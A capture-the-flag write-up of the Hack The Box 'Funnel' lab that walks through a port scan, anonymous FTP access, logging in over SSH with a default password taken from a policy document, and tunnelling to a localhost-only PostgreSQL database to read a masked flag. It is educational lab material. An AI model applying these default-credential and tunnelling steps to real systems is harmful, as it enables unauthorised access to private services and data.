HTB Funnel

$ nmap -v -sV -p- 10.129.74.179 --min-rate 5000

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 10:15 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 10:15
Scanning 10.129.74.179 [2 ports]
Completed Ping Scan at 10:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.02s elapsed
Initiating Connect Scan at 10:15
Scanning 10.129.74.179 [65535 ports]
Discovered open port 21/tcp on 10.129.74.179
Discovered open port 22/tcp on 10.129.74.179
Completed Connect Scan at 10:15, 12.86s elapsed (65535 total ports)
Initiating Service scan at 10:15
Scanning 2 services on 10.129.74.179
Completed Service scan at 10:15, 0.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.74.179.
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Nmap scan report for 10.129.74.179
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds

$ ftp 10.129.74.179

Connected to 10.129.74.179.
220 (vsFTPd 3.0.3)
Name (10.129.74.179:ruben): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33254|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 28 14:31 mail_backup
226 Directory send OK.
ftp> 

Users detected:

 optimus@funnel.htb 
 albert@funnel.htb 
 andreas@funnel.htb 
 christine@funnel.htb 
 maria@funnel.htb

According to the password policy found, the default’s password is funnel123#!#

$ ssh christine@10.129.74.179

christine@10.129.74.179's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 04 Mar 2023 09:30:41 AM UTC

  System load:              0.0
  Usage of /:               63.2% of 4.78GB
  Memory usage:             12%
  Swap usage:               0%
  Processes:                159
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for ens160:  10.129.74.179
  IPv6 address for ens160:  dead:beef::250:56ff:fe96:a7ea

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Which service is running on TCP port 5432 and listens only on localhost?

christine@funnel:~$ ss -tulpn

Netid                   State                    Recv-Q                   Send-Q                                     Local Address:Port                                       Peer Address:Port                   Process                   
udp                     UNCONN                   0                        0                                          127.0.0.53%lo:53                                              0.0.0.0:*                                                
udp                     UNCONN                   0                        0                                                0.0.0.0:68                                              0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                           127.0.0.1:36709                                           0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                       127.0.0.53%lo:53                                              0.0.0.0:*                                                
tcp                     LISTEN                   0                        128                                              0.0.0.0:22                                              0.0.0.0:*                                                
tcp                     LISTEN                   0                        4096                                           127.0.0.1:5432                                            0.0.0.0:*                                                
tcp                     LISTEN                   0                        32                                                     *:21                                                    *:*                                                
tcp                     LISTEN                   0                        128                                                 [::]:22                                                 [::]:*    

Port 5432 is usually used by PostgreSQL

As we don’t have access to the previously mentioned service from our local machine, we need to create a tunnel and connect to it from your machine.

$ ssh -L 1234:localhost:5432 christine@10.129.74.179

christine@10.129.74.179's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 04 Mar 2023 10:16:35 AM UTC

  System load:              0.0
  Usage of /:               63.2% of 4.78GB
  Memory usage:             13%
  Swap usage:               0%
  Processes:                161
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for ens160:  10.129.74.179
  IPv6 address for ens160:  dead:beef::250:56ff:fe96:a7ea

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Mar  4 10:10:01 2023 from 10.10.14.16

$ psql -U christine -h localhost -p 1234

Contraseña para usuario christine: 
psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Digite «help» para obtener ayuda.

christine=

christine=# \l

                                                      Listado de base de datos
  Nombre   |   Dueño   | Codificación |  Collate   |   Ctype    | configuración ICU | Proveedor de locale |       Privilegios       
-----------+-----------+--------------+------------+------------+-------------------+---------------------+-------------------------
 christine | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | 
 postgres  | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | 
 secrets   | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | 
 template0 | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | =c/christine           +
           |           |              |            |            |                   |                     | christine=CTc/christine
 template1 | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | =c/christine           +
           |           |              |            |            |                   |                     | christine=CTc/christine
(5 filas)

christine=# \c secrets

psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Ahora está conectado a la base de datos «secrets» con el usuario «christine».
secrets=# \dt
        Listado de relaciones
 Esquema | Nombre | Tipo  |   Dueño   
---------+--------+-------+-----------
 public  | flag   | tabla | christine
(1 fila)

secrets=# SELECT * FROM flag;

secrets=# SELECT * FROM flag;
              value               
----------------------------------
 cf27XXXXXXXXXXXXXXXXXXXXXXXXXXXX
(1 fila)

secrets=#